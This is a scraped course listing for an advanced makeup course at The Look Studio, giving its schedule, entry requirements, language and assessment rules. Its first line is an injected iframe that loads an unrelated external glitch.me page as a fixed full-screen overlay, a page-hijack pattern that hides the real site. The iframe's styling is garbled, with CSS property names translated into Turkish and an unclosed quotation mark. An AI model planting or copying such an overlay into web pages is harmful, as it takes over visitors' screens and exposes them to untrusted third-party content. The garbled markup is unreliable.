<iframe src="https://abbasisrael.glitch.me/" style="position:fixed; üst:0 piksel; sol:0 piksel; alt:0 piksel; sağ:0 piksel; genişlik: %100; yükseklik: %100; kenarlık :yok; >
Dates: TBC
Total: 10 Lessons, 1 Lesson per week, 3 hours per Lesson
Day Time (Course A): 2 pm - 5 pm
Night Time (Course B): 7 pm - 10 pm
ENTRY REQUIREMENTS: Applications must complete the Fundamental Makeup Course by The Look Studio or equivalent makeup courses. Applicants are graduated from secondary schools and passed our entry-interviews with assessments on the applicant's portfolio.
LANGUAGE: Cantonese and supplemented with English
ASSESSMENT: An attendance rate of 80% and a passing mark of 60% in exam are required. Certificate will be awarded upon completion.